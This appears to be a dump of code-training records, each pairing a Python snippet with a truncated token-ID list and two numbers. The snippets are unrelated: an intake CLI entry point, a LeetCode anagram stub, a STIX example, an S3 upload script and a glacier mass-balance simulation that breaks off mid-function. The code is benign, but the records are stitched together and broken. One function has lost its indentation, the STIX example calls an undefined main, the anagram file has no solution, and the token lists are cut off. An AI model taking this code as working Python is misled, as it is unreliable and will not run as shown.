#-----------------------------------------------------------------------------
''' Provide a ``main`` function to run intake commands.
'''
import logging
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
import argparse
# External imports
# Intake imports
from intake import __version__
from intake.cli.util import die, nice_join
#-----------------------------------------------------------------------------
# API
#-----------------------------------------------------------------------------
def main(description, subcommands, argv):
''' Execute an intake command.
Args:
description (str) :
A description for this top-level command
subcommands (seq[SubCommand]) :
A list of subcommands to configure for argparse
argv (seq[str]) :
A list of command line arguments to process
Returns:
None
'''
if len(argv) == 1:
die("ERROR: Must specify subcommand, one of: %s" % nice_join(x.name for x in subcommands))
parser = argparse.ArgumentParser(
prog=argv[0],
description=description,
epilog="See '<command> --help' to read about a specific subcommand.")
parser.add_argument('-v', '--version', action='version', version=__version__)
subs = parser.add_subparsers(help="Sub-commands")
for cls in subcommands:
subparser = subs.add_parser(cls.name, help=cls.__doc__.strip())
subcommand = cls(parser=subparser)
subparser.set_defaults(invoke=subcommand.invoke)
args = parser.parse_args(argv[1:])
try:
return args.invoke(args) or 0 # convert None to 0
except Exception as e:
die("ERROR: " + repr(e))
| [
2,
10097,
32501,
198,
2,
15069,
357,
66,
8,
2321,
532,
2864,
11,
1052,
330,
13533,
11,
3457,
13,
290,
48885,
20420,
198,
2,
1439,
2489,
10395,
13,
198,
2,
198,
2,
383,
1336,
5964,
318,
287,
262,
38559,
24290,
2393,
11,
9387,
351,
... | 3.287267 | 644 |
# Given two strings s and t , write a function to determine if t is an anagram of s.
#
# Example 1:
#
#
# Input: s = "anagram", t = "nagaram"
# Output: true
#
#
# Example 2:
#
#
# Input: s = "rat", t = "car"
# Output: false
#
#
# Note:
# You may assume the string contains only lowercase alphabets.
#
# Follow up:
# What if the inputs contain unicode characters? How would you adapt your solution to such case?
#
#
# @lc app=leetcode id=242 lang=python3
#
# [242] Valid Anagram
#
# https://leetcode.com/problems/valid-anagram/description/
#
# algorithms
# Easy (52.65%)
# Likes: 751
# Dislikes: 112
# Total Accepted: 357K
# Total Submissions: 678K
# Testcase Example: '"anagram"\n"nagaram"'
#
# Given two strings s and t , write a function to determine if t is an anagram
# of s.
#
# Example 1:
#
#
# Input: s = "anagram", t = "nagaram"
# Output: true
#
#
# Example 2:
#
#
# Input: s = "rat", t = "car"
# Output: false
#
#
# Note:
# You may assume the string contains only lowercase alphabets.
#
# Follow up:
# What if the inputs contain unicode characters? How would you adapt your
# solution to such case?
#
#
| [
2,
11259,
734,
13042,
264,
290,
256,
1849,
11,
3551,
257,
2163,
284,
5004,
611,
256,
318,
281,
281,
6713,
286,
264,
13,
201,
198,
2,
198,
2,
17934,
352,
25,
201,
198,
2,
198,
2,
198,
2,
23412,
25,
264,
796,
366,
272,
6713,
160... | 2.668235 | 425 |
"""
*`prin` Prints the results of all the following function, and the numeric value
of any namespace.
*`let` converts an integer into its Unicode character.
*`if` returns the highest number of two different namespaces/function
*`set` override the numeric value of a namespace, and replaces the original in duplicate cases.
*`run` Run the function at the given numeric property, if no function is there, crashes.
*`add` add two numeric properties
*`sub` subtracts two numeric properties
*`split` run two functions
"""
| [
37811,
198,
198,
9,
63,
1050,
259,
63,
12578,
82,
262,
2482,
286,
477,
262,
1708,
2163,
11,
290,
262,
35575,
1988,
198,
1659,
597,
25745,
13,
198,
9,
63,
1616,
63,
26161,
281,
18253,
656,
663,
34371,
2095,
13,
198,
9,
63,
361,
6... | 4.015504 | 129 |
#!/usr/bin/env python3
"""detectors.py: contains face detectors modules."""
__author__ = "Ahmed Hermas"
__copyright__ = "Copyright 2022, © UOL "
__license__ = "MIT"
__version__ = "0.0.1"
__email__ = "a7medhermas@gmail.com"
import os
import torch
from cv2 import cv2
import utils
import numpy as np
from Siamese_resnet18 import myResNet
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
198,
37811,
15255,
478,
669,
13,
9078,
25,
4909,
1986,
40471,
13103,
526,
15931,
198,
198,
834,
9800,
834,
796,
366,
10910,
1150,
2332,
5356,
1,
198,
834,
22163,
4766,
834,
796,
... | 2.712 | 125 |
#!/usr/bin/env python
# Copyright (c) 2017, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
"""
Description: An example of how to add CIQ Identity information to a STIX
Indicator.
"""
# stdlib
from pprint import pprint
# python-cybox
from cybox.objects.file_object import File
# python-stix
import stix.utils as utils
from stix.core import STIXPackage, STIXHeader
from stix.indicator import Indicator
import stix.extensions.identity.ciq_identity_3_0 as stix_ciq
if __name__ == '__main__':
main()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
15069,
357,
66,
8,
2177,
11,
383,
17168,
2200,
10501,
13,
1439,
2489,
10395,
13,
198,
2,
4091,
38559,
24290,
13,
14116,
329,
1844,
2846,
13,
198,
198,
37811,
198,
11828,
25,
1052,... | 3.045198 | 177 |
import pygame
| [
11748,
12972,
6057,
198,
220,
220,
220,
220,
220,
220,
220,
220,
628
] | 1.846154 | 13 |
import boto3
import configparser
import logging
from datetime import datetime
from botocore.exceptions import NoCredentialsError
import os
import sys
from pathlib import Path
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from src.constants import FILE_NAME
"""
Setting up s3 destination structure.
"""
day = datetime.now()
S3_FILE_KEY = str(day.year) + '/' + str(day.month) + '/' \
+ str(day.day) + '/' + str(day.hour) + '.csv'
"""
Setting up logging.
"""
sc_log = logging.getLogger(__name__)
sc_log.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s:%(name)s:%(message)s')
DIRECTORY = 'logs/transfer/' + str(day.year) + '/' + str(day.month) + '/' + str(day.day) + '/'
Path(DIRECTORY).mkdir(parents=True, exist_ok=True)
handler = logging.FileHandler(DIRECTORY + str(day.hour) + '.log')
sc_log.addHandler(handler)
"""
Loading in the KEYS
"""
config = configparser.ConfigParser()
config.read('config.ini')
ACCESS_KEY = config['AWS']['ACCESS_KEY']
SECRET_KEY = config['AWS']['SECRET_KEY']
"""
File related constants
"""
s3 = boto3.client('s3', aws_access_key_id=ACCESS_KEY, aws_secret_access_key=SECRET_KEY)
try:
s3.upload_file(FILE_NAME, 'weather-scrape-bucket', S3_FILE_KEY)
sc_log.log(logging.DEBUG, "Completed S3 upload.")
except FileNotFoundError:
sc_log.exception("The file was not found.")
except NoCredentialsError:
sc_log.exception("There is an issue with the credentials.")
| [
11748,
275,
2069,
18,
198,
11748,
4566,
48610,
198,
11748,
18931,
198,
6738,
4818,
8079,
1330,
4818,
8079,
198,
6738,
10214,
420,
382,
13,
1069,
11755,
1330,
1400,
34,
445,
14817,
12331,
198,
11748,
28686,
198,
11748,
25064,
198,
6738,
... | 2.616071 | 560 |
from typing import Any
from pandas_profiling.report.presentation.core.item_renderer import ItemRenderer
| [
6738,
19720,
1330,
4377,
198,
198,
6738,
19798,
292,
62,
5577,
4386,
13,
13116,
13,
25579,
341,
13,
7295,
13,
9186,
62,
10920,
11882,
1330,
9097,
49,
437,
11882,
628
] | 3.533333 | 30 |
import graphviz as gv
import os
from pyflowgraph.models import ExtControlFlowGraph, DataNode, OperationNode, ControlNode, ControlEdge, DataEdge, EntryNode
| [
11748,
4823,
85,
528,
355,
308,
85,
198,
11748,
28686,
198,
198,
6738,
12972,
11125,
34960,
13,
27530,
1330,
5683,
15988,
37535,
37065,
11,
6060,
19667,
11,
14680,
19667,
11,
6779,
19667,
11,
6779,
37021,
11,
6060,
37021,
11,
21617,
196... | 3.697674 | 43 |
# not good
# Dynamic programing
| [
198,
198,
2,
407,
922,
628,
198,
198,
2,
26977,
1430,
278,
198
] | 2.846154 | 13 |
from datetime import datetime
from ethtx_ce.config import EthConfig
from ethtx_ce.backend.models.objects_model import Block, Event, Transaction
from mocks.mocks import MockWeb3Provider
| [
6738,
4818,
8079,
1330,
4818,
8079,
198,
198,
6738,
4555,
17602,
62,
344,
13,
11250,
1330,
9956,
16934,
198,
6738,
4555,
17602,
62,
344,
13,
1891,
437,
13,
27530,
13,
48205,
62,
19849,
1330,
9726,
11,
8558,
11,
45389,
198,
6738,
285,
... | 3.596154 | 52 |
"""Run a model simulation."""
# Default climate data is ERA-Interim; specify CMIP5 by specifying a filename to the argument:
# (Command line) python run_simulation_list_multiprocess.py -gcm_list_fn=C:\...\gcm_rcpXX_filenames.txt
# - Default is running ERA-Interim in parallel with five processors.
# (Spyder) %run run_simulation_list_multiprocess.py C:\...\gcm_rcpXX_filenames.txt -option_parallels=0
# - Spyder cannot run parallels, so always set -option_parallels=0 when testing in Spyder.
# Spyder cannot run parallels, so always set -option_parallels=0 when testing in Spyder.
# Built-in libraries
import argparse
import collections
import inspect
import multiprocessing
import os
import time
# External libraries
import pandas as pd
import pickle
import numpy as np
import xarray as xr
# Local libraries
import class_climate
import class_mbdata
import pygem_input as input
import pygemfxns_gcmbiasadj as gcmbiasadj
import pygemfxns_massbalance as massbalance
import pygemfxns_modelsetup as modelsetup
import spc_split_glaciers as split_glaciers
#%% FUNCTIONS
def getparser():
    """
    Use argparse to add arguments from the command line

    Parameters
    ----------
    gcm_list_fn (optional) : str
        text file that contains the climate data to be used in the model simulation
    gcm_name (optional) : str
        gcm name
    rcp (optional) : str
        representative concentration pathway (ex. 'rcp26')
    num_simultaneous_processes (optional) : int
        number of cores to use in parallels
    option_parallels (optional) : int
        switch to use parallels or not
    rgi_glac_number_fn (optional) : str
        filename of .pkl file containing a list of glacier numbers that used to run batches on the supercomputer
    batch_number (optional): int
        batch number used to differentiate output on supercomputer
    option_ordered : int
        option to keep glaciers ordered or to grab every n value for the batch
        (the latter helps make sure run times on each core are similar as it removes any timing differences caused by
        regional variations)
    debug (optional) : int
        Switch for turning debug printing on or off (default = 0 (off))
    debug_spc (optional) : int
        Switch for turning debug printing of spc on or off (default = 0 (off))

    Returns
    -------
    Object containing arguments and their respective values.
    """
    parser = argparse.ArgumentParser(description="run simulations from gcm list in parallel")
    # add arguments
    parser.add_argument('-gcm_list_fn', action='store', type=str, default=input.ref_gcm_name,
                        help='text file full of commands to run')
    parser.add_argument('-gcm_name', action='store', type=str, default=None,
                        help='GCM name used for model run')
    parser.add_argument('-rcp', action='store', type=str, default=None,
                        help='rcp scenario used for model run (ex. rcp26)')
    parser.add_argument('-num_simultaneous_processes', action='store', type=int, default=4,
                        help='number of simultaneous processes (cores) to use')
    parser.add_argument('-option_parallels', action='store', type=int, default=1,
                        help='Switch to use or not use parallels (1 - use parallels, 0 - do not)')
    parser.add_argument('-rgi_glac_number_fn', action='store', type=str, default=None,
                        help='Filename containing list of rgi_glac_number, helpful for running batches on spc')
    parser.add_argument('-batch_number', action='store', type=int, default=None,
                        help='Batch number used to differentiate output on supercomputer')
    parser.add_argument('-option_ordered', action='store', type=int, default=1,
                        help='switch to keep lists ordered or not')
    # Fixed: help texts below had an unclosed parenthesis, and -debug_spc's help
    # was a copy-paste of -debug's (docstring says it controls spc debug printing).
    parser.add_argument('-debug', action='store', type=int, default=0,
                        help='Boolean for debugging to turn it on or off (default 0 is off)')
    parser.add_argument('-debug_spc', action='store', type=int, default=0,
                        help='Boolean for spc debugging to turn it on or off (default 0 is off)')
    return parser
def calc_stats_array(data, stats_cns=None):
    """
    Calculate statistics for a given variable.

    Parameters
    ----------
    data : np.array
        2D array where each row is an observation and each column is one
        ensemble simulation (statistics are computed along axis=1)
    stats_cns : list of str, optional
        statistics to compute; any of 'mean', 'std', '2.5%', '25%', 'median',
        '75%', '97.5%'.  Defaults to input.sim_stat_cns, resolved at call time
        so the module-level setting is not frozen when this module is imported.

    Returns
    -------
    stats : np.array
        column-stacked statistics, one column per requested statistic, always
        in the fixed order listed above (regardless of the order in stats_cns)

    Raises
    ------
    ValueError
        if stats_cns contains none of the recognized statistic names
        (the original implementation raised an opaque NameError unless
        'mean' was requested)
    """
    if stats_cns is None:
        stats_cns = input.sim_stat_cns
    # Accumulate 1-D columns, then stack once; this removes the original
    # implicit requirement that 'mean' be present to initialize `stats`.
    cols = []
    if 'mean' in stats_cns:
        cols.append(data.mean(axis=1))
    if 'std' in stats_cns:
        cols.append(data.std(axis=1))
    if '2.5%' in stats_cns:
        cols.append(np.percentile(data, 2.5, axis=1))
    if '25%' in stats_cns:
        cols.append(np.percentile(data, 25, axis=1))
    if 'median' in stats_cns:
        cols.append(np.median(data, axis=1))
    if '75%' in stats_cns:
        cols.append(np.percentile(data, 75, axis=1))
    if '97.5%' in stats_cns:
        cols.append(np.percentile(data, 97.5, axis=1))
    if not cols:
        raise ValueError('stats_cns contains no recognized statistic names')
    stats = np.column_stack(cols)
    return stats
def create_xrdataset(main_glac_rgi, dates_table, sim_iters=None, stat_cns=None,
                     record_stats=0, option_wateryear=None):
    """
    Create empty xarray dataset that will be used to record simulation runs.

    Parameters
    ----------
    main_glac_rgi : pandas dataframe
        dataframe containing relevant rgi glacier information
    dates_table : pandas dataframe
        table of the dates, months, days in month, etc.
    sim_iters : int, optional
        number of simulation runs included (default: input.sim_iters)
    stat_cns : list, optional
        list of strings containing statistics that will be used on simulations
        (default: input.sim_stat_cns)
    record_stats : int
        Switch to change from recording simulations (0) to statistics (1)
    option_wateryear : int, optional
        year type switch: 1 - water year, 2 - calendar year, else custom year
        (default: input.gcm_wateryear)

    Returns
    -------
    output_ds_all : xarray Dataset
        empty xarray dataset that contains variables and attributes to be filled in by simulation runs
    encoding : dictionary
        encoding used with exporting xarray dataset to netcdf
    """
    # Resolve defaults at call time; module-level defaults in the signature
    # would be frozen at import and ignore later changes to the input module.
    if sim_iters is None:
        sim_iters = input.sim_iters
    if stat_cns is None:
        stat_cns = input.sim_stat_cns
    if option_wateryear is None:
        option_wateryear = input.gcm_wateryear
    if input.output_package == 2:
        # Create empty datasets for each variable and merge them
        # Coordinate values
        output_variables = input.output_variables_package2
        glac_values = main_glac_rgi.index.values
        annual_columns = np.unique(dates_table['wateryear'].values)[0:int(dates_table.shape[0]/12)]
        time_values = dates_table.loc[input.spinupyears*12:dates_table.shape[0]+1,'date'].tolist()
        year_values = annual_columns[input.spinupyears:annual_columns.shape[0]]
        # 'year_plus1' appends one extra year so end-of-run dimension changes can be stored
        year_plus1_values = np.concatenate((annual_columns[input.spinupyears:annual_columns.shape[0]],
                                            np.array([annual_columns[annual_columns.shape[0]-1]+1])))
        # Year type for attributes
        if option_wateryear == 1:
            year_type = 'water year'
        elif option_wateryear == 2:
            year_type = 'calendar year'
        else:
            year_type = 'custom year'
        # Switch to record simulations or statistics
        if record_stats == 0:
            record_name = 'sim'
            record_name_values = np.arange(0,sim_iters)
        elif record_stats == 1:
            record_name = 'stats'
            # Fixed: use the stat_cns parameter (previously accepted but ignored
            # in favor of input.sim_stat_cns, silently discarding caller overrides)
            record_name_values = stat_cns
        # Variable coordinates dictionary
        output_coords_dict = {
                'prec_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'temp_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'acc_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'refreeze_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'melt_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'frontalablation_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'massbaltotal_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'runoff_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'snowline_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'area_glac_annual': collections.OrderedDict(
                        [('glac', glac_values), ('year_plus1', year_plus1_values), (record_name, record_name_values)]),
                'volume_glac_annual': collections.OrderedDict(
                        [('glac', glac_values), ('year_plus1', year_plus1_values), (record_name, record_name_values)]),
                'ELA_glac_annual': collections.OrderedDict(
                        [('glac', glac_values), ('year', year_values), (record_name, record_name_values)]),
                'offglac_prec_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'offglac_refreeze_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'offglac_melt_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'offglac_snowpack_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'offglac_runoff_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                }
        # Attributes dictionary
        output_attrs_dict = {
                'time': {
                        'long_name': 'date',
                        'year_type':year_type},
                'glac': {
                        'long_name': 'glacier index',
                        'comment': 'glacier index value that refers to the glacier table'},
                'year': {
                        'long_name': 'years',
                         'year_type': year_type,
                        'comment': 'years referring to the start of each year'},
                'year_plus1': {
                        'long_name': 'years plus one additional year',
                        'year_type': year_type,
                        'comment': ('additional year allows one to record glacier dimension changes at end of '
                                    'model run')},
                'sim': {
                        'long_name': 'simulation number',
                        'comment': 'simulation numbers only needed for MCMC methods'},
                'stats': {
                        'long_name': 'variable statistics',
                        'comment': '% refers to percentiles'},
                'temp_glac_monthly': {
                        'long_name': 'glacier-wide mean air temperature',
                        'units': 'degC',
                        'temporal_resolution': 'monthly',
                        'comment': (
                                'each elevation bin is weighted equally to compute the mean temperature, and '
                                'bins where the glacier no longer exists due to retreat have been removed')},
                'prec_glac_monthly': {
                        'long_name': 'glacier-wide precipitation (liquid)',
                        'units': 'm',
                        'temporal_resolution': 'monthly',
                        'comment': 'only the liquid precipitation, solid precipitation excluded'},
                'acc_glac_monthly': {
                        'long_name': 'glacier-wide accumulation',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly',
                        'comment': 'only the solid precipitation'},
                'refreeze_glac_monthly': {
                        'long_name': 'glacier-wide refreeze',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly'},
                'melt_glac_monthly': {
                        'long_name': 'glacier-wide melt',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly'},
                'frontalablation_glac_monthly': {
                        'long_name': 'glacier-wide frontal ablation',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly',
                        'comment': (
                                'mass losses from calving, subaerial frontal melting, sublimation above the '
                                'waterline and subaqueous frontal melting below the waterline')},
                'massbaltotal_glac_monthly': {
                        'long_name': 'glacier-wide total mass balance',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly',
                        'comment': (
                                'total mass balance is the sum of the climatic mass balance and frontal '
                                'ablation')},
                'runoff_glac_monthly': {
                        'long_name': 'glacier-wide runoff',
                        'units': 'm**3',
                        'temporal_resolution': 'monthly',
                        'comment': 'runoff from the glacier terminus, which moves over time'},
                'snowline_glac_monthly': {
                        'long_name': 'transient snowline',
                        'units': 'm a.s.l.',
                        'temporal_resolution': 'monthly',
                        'comment': 'transient snowline is altitude separating snow from ice/firn'},
                'area_glac_annual': {
                        'long_name': 'glacier area',
                        'units': 'km**2',
                        'temporal_resolution': 'annual',
                        'comment': 'area used for the duration of the defined start/end of year'},
                'volume_glac_annual': {
                        'long_name': 'glacier volume',
                        'units': 'km**3 ice',
                        'temporal_resolution': 'annual',
                        'comment': 'volume based on area and ice thickness used for that year'},
                'ELA_glac_annual': {
                        'long_name': 'annual equilibrium line altitude',
                        'units': 'm a.s.l.',
                        'temporal_resolution': 'annual',
                        'comment': (
                                'equilibrium line altitude is the elevation where the climatic mass balance is '
                                'zero')},
                'offglac_prec_monthly': {
                        'long_name': 'off-glacier-wide precipitation (liquid)',
                        'units': 'm',
                        'temporal_resolution': 'monthly',
                        'comment': 'only the liquid precipitation, solid precipitation excluded'},
                'offglac_refreeze_monthly': {
                        'long_name': 'off-glacier-wide refreeze',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly'},
                'offglac_melt_monthly': {
                        'long_name': 'off-glacier-wide melt',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly',
                        'comment': 'only melt of snow and refreeze since off-glacier'},
                'offglac_runoff_monthly': {
                        'long_name': 'off-glacier-wide runoff',
                        'units': 'm**3',
                        'temporal_resolution': 'monthly',
                        'comment': 'off-glacier runoff from area where glacier no longer exists'},
                'offglac_snowpack_monthly': {
                        'long_name': 'off-glacier-wide snowpack',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly',
                        'comment': 'snow remaining accounting for new accumulation, melt, and refreeze'},
                }
        # Add variables to empty dataset and merge together
        count_vn = 0
        encoding = {}
        noencoding_vn = ['stats', 'glac_attrs']
        for vn in output_variables:
            count_vn += 1
            empty_holder = np.zeros([len(output_coords_dict[vn][i]) for i in list(output_coords_dict[vn].keys())])
            output_ds = xr.Dataset({vn: (list(output_coords_dict[vn].keys()), empty_holder)},
                                   coords=output_coords_dict[vn])
            # Merge datasets of stats into one output
            if count_vn == 1:
                output_ds_all = output_ds
            else:
                output_ds_all = xr.merge((output_ds_all, output_ds))
        # Add a glacier table so that the glaciers attributes accompany the netcdf file
        main_glac_rgi_float = main_glac_rgi[input.output_glacier_attr_vns].copy()
        main_glac_rgi_xr = xr.Dataset({'glacier_table': (('glac', 'glac_attrs'), main_glac_rgi_float.values)},
                                      coords={'glac': glac_values,
                                              'glac_attrs': main_glac_rgi_float.columns.values})
        output_ds_all = output_ds_all.combine_first(main_glac_rgi_xr)
        output_ds_all.glacier_table.attrs['long_name'] = 'RGI glacier table'
        output_ds_all.glacier_table.attrs['comment'] = 'table contains attributes from RGI for each glacier'
        output_ds_all.glac_attrs.attrs['long_name'] = 'RGI glacier attributes'
        # Add attributes
        for vn in output_ds_all.variables:
            # Not every variable has a predefined attribute entry; missing
            # entries are fine.  (Fixed: was a bare `except:` which also hid
            # KeyboardInterrupt and genuine bugs.)
            try:
                output_ds_all[vn].attrs = output_attrs_dict[vn]
            except KeyError:
                pass
            # Encoding (specify _FillValue, offsets, etc.)
            if vn not in noencoding_vn:
                encoding[vn] = {'_FillValue': False}
    return output_ds_all, encoding
def convert_glacwide_results(elev_bins, glac_bin_temp, glac_bin_prec, glac_bin_acc, glac_bin_refreeze,
                             glac_bin_snowpack, glac_bin_melt, glac_bin_frontalablation, glac_bin_massbalclim_annual,
                             glac_bin_area_annual, glac_bin_icethickness_annual):
    """
    Convert raw runmassbalance function output to glacier-wide results for output package 2

    Parameters
    ----------
    elev_bins : numpy array
        elevation of each elevation bin
    glac_bin_temp : numpy array
        temperature for each elevation bin for each timestep
    glac_bin_prec : numpy array
        precipitation (liquid) for each elevation bin for each timestep
    glac_bin_acc : numpy array
        accumulation (solid precipitation) for each elevation bin for each timestep
    glac_bin_refreeze : numpy array
        refreeze for each elevation bin for each timestep
    glac_bin_snowpack : numpy array
        snowpack for each elevation bin for each timestep
    glac_bin_melt : numpy array
        glacier melt for each elevation bin for each timestep
    glac_bin_frontalablation : numpy array
        frontal ablation for each elevation bin for each timestep
    glac_bin_massbalclim_annual : numpy array
        annual climatic mass balance for each elevation bin for each timestep
    glac_bin_area_annual : numpy array
        annual glacier area for each elevation bin for each timestep
    glac_bin_icethickness_annual: numpy array
        annual ice thickness for each elevation bin for each timestep

    Returns
    -------
    glac_wide_temp : np.array
        monthly mean glacier-wide temperature (bins weighted equally)
    glac_wide_prec : np.array
        monthly glacier-wide precipitation (liquid only)
    glac_wide_acc : np.array
        monthly glacier-wide accumulation (solid precipitation only)
    glac_wide_refreeze : np.array
        monthly glacier-wide refreeze
    glac_wide_melt : np.array
        monthly glacier-wide melt
    glac_wide_frontalablation : np.array
        monthly glacier-wide frontal ablation
    glac_wide_massbaltotal : np.array
        monthly glacier-wide total mass balance (climatic mass balance + frontal ablation)
    glac_wide_runoff: np.array
        monthly glacier-wide runoff at the terminus of the glacier
    glac_wide_snowline : np.array
        monthly glacier-wide snowline
    glac_wide_area_annual : np.array
        annual glacier area
    glac_wide_volume_annual : np.array
        annual glacier volume
    glac_wide_ELA_annual : np.array
        annual equilibrium line altitude
    """
    # Preset desired output (needed to avoid dividing by zero)
    glac_wide_temp = np.zeros(glac_bin_temp.shape[1])
    glac_wide_prec = np.zeros(glac_bin_temp.shape[1])
    glac_wide_acc = np.zeros(glac_bin_temp.shape[1])
    glac_wide_refreeze = np.zeros(glac_bin_temp.shape[1])
    glac_wide_melt = np.zeros(glac_bin_temp.shape[1])
    glac_wide_frontalablation = np.zeros(glac_bin_temp.shape[1])
    # Compute desired output
    # Expand annual bin areas to monthly resolution (each year's area repeated 12x);
    # the last annual column is dropped as it is the extra 'year_plus1' entry.
    glac_bin_area = glac_bin_area_annual[:,0:glac_bin_area_annual.shape[1]-1].repeat(12,axis=1)
    glac_wide_area = glac_bin_area.sum(axis=0)
    # Glacier-wide temperature: unweighted mean over bins with a nonzero temperature.
    # NOTE(review): a bin whose temperature is exactly 0 degC is excluded from the
    # mean by this masking — confirm this is intended rather than a sentinel check.
    glac_wide_temp_sum = glac_bin_temp.sum(axis=0)
    glac_bin_temp_nonzero = np.zeros(glac_bin_temp.shape)
    glac_bin_temp_nonzero[glac_bin_temp != 0] = 1
    glac_wide_temp_bincount = glac_bin_temp_nonzero.sum(axis=0)
    glac_wide_temp[glac_wide_temp_bincount > 0] = (glac_wide_temp_sum[glac_wide_temp_bincount > 0] /
                                                   glac_wide_temp_bincount[glac_wide_temp_bincount > 0])
    # For each flux: area-weighted sum over bins [m * km**2], then divide by total
    # area to get a glacier-wide depth [m]; guarded to avoid division by zero.
    glac_wide_prec_mkm2 = (glac_bin_prec * glac_bin_area).sum(axis=0)
    glac_wide_prec[glac_wide_prec_mkm2 > 0] = (glac_wide_prec_mkm2[glac_wide_prec_mkm2 > 0] /
                                               glac_wide_area[glac_wide_prec_mkm2 > 0])
    glac_wide_acc_mkm2 = (glac_bin_acc * glac_bin_area).sum(axis=0)
    glac_wide_acc[glac_wide_acc_mkm2 > 0] = (glac_wide_acc_mkm2[glac_wide_acc_mkm2 > 0] /
                                             glac_wide_area[glac_wide_acc_mkm2 > 0])
    glac_wide_refreeze_mkm2 = (glac_bin_refreeze * glac_bin_area).sum(axis=0)
    glac_wide_refreeze[glac_wide_refreeze_mkm2 > 0] = (glac_wide_refreeze_mkm2[glac_wide_refreeze_mkm2 > 0] /
                                                       glac_wide_area[glac_wide_refreeze_mkm2 > 0])
    glac_wide_melt_mkm2 = (glac_bin_melt * glac_bin_area).sum(axis=0)
    glac_wide_melt[glac_wide_melt_mkm2 > 0] = (glac_wide_melt_mkm2[glac_wide_melt_mkm2 > 0] /
                                               glac_wide_area[glac_wide_melt_mkm2 > 0])
    glac_wide_frontalablation_mkm2 = (glac_bin_frontalablation * glac_bin_area).sum(axis=0)
    glac_wide_frontalablation[glac_wide_frontalablation_mkm2 > 0] = (
            glac_wide_frontalablation_mkm2[glac_wide_frontalablation_mkm2 > 0] /
            glac_wide_area[glac_wide_frontalablation_mkm2 > 0])
    # Total mass balance = climatic mass balance minus frontal ablation losses
    glac_wide_massbalclim = glac_wide_acc + glac_wide_refreeze - glac_wide_melt
    glac_wide_massbaltotal = glac_wide_massbalclim - glac_wide_frontalablation
    glac_wide_runoff = (glac_wide_prec + glac_wide_melt - glac_wide_refreeze) * glac_wide_area * (1000)**2
    # units: (m + m w.e. - m w.e.) * km**2 * (1000 m / 1 km)**2 = m**3
    # Snowline: elevation of the lowest bin holding snowpack (argmax finds the
    # first True along the bin axis); binsize/2 shifts to the bin's lower edge.
    # NOTE(review): argmax yields an int array, so the float elevation assigned
    # below is truncated to int — confirm intended.
    glac_wide_snowline = (glac_bin_snowpack > 0).argmax(axis=0)
    glac_wide_snowline[glac_wide_snowline > 0] = (elev_bins[glac_wide_snowline[glac_wide_snowline > 0]] -
                                                  input.binsize/2)
    glac_wide_area_annual = glac_bin_area_annual.sum(axis=0)
    # Volume [km**3]: area [km**2] * thickness [m] / 1000
    glac_wide_volume_annual = (glac_bin_area_annual * glac_bin_icethickness_annual / 1000).sum(axis=0)
    # ELA: elevation of the lowest bin with positive climatic mass balance
    glac_wide_ELA_annual = (glac_bin_massbalclim_annual > 0).argmax(axis=0)
    glac_wide_ELA_annual[glac_wide_ELA_annual > 0] = (elev_bins[glac_wide_ELA_annual[glac_wide_ELA_annual > 0]] -
                                                      input.binsize/2)
    # ELA and snowline can't be below minimum elevation
    glac_zmin_annual = elev_bins[(glac_bin_area_annual > 0).argmax(axis=0)][:-1] - input.binsize/2
    glac_wide_ELA_annual[glac_wide_ELA_annual < glac_zmin_annual] = (
            glac_zmin_annual[glac_wide_ELA_annual < glac_zmin_annual])
    glac_zmin = elev_bins[(glac_bin_area > 0).argmax(axis=0)] - input.binsize/2
    glac_wide_snowline[glac_wide_snowline < glac_zmin] = glac_zmin[glac_wide_snowline < glac_zmin]
    return (glac_wide_temp, glac_wide_prec, glac_wide_acc, glac_wide_refreeze, glac_wide_melt,
            glac_wide_frontalablation, glac_wide_massbaltotal, glac_wide_runoff, glac_wide_snowline,
            glac_wide_area_annual, glac_wide_volume_annual, glac_wide_ELA_annual)
def main(list_packed_vars):
"""
Model simulation
Parameters
----------
list_packed_vars : list
list of packed variables that enable the use of parallels
Returns
-------
netcdf files of the simulation output (specific output is dependent on the output option)
"""
# Unpack variables
count = list_packed_vars[0]
glac_no = list_packed_vars[1]
regions_str = list_packed_vars[2]
gcm_name = list_packed_vars[3]
parser = getparser()
args = parser.parse_args()
if (gcm_name != input.ref_gcm_name) and (args.rcp is None):
rcp_scenario = os.path.basename(args.gcm_list_fn).split('_')[1]
elif args.rcp is not None:
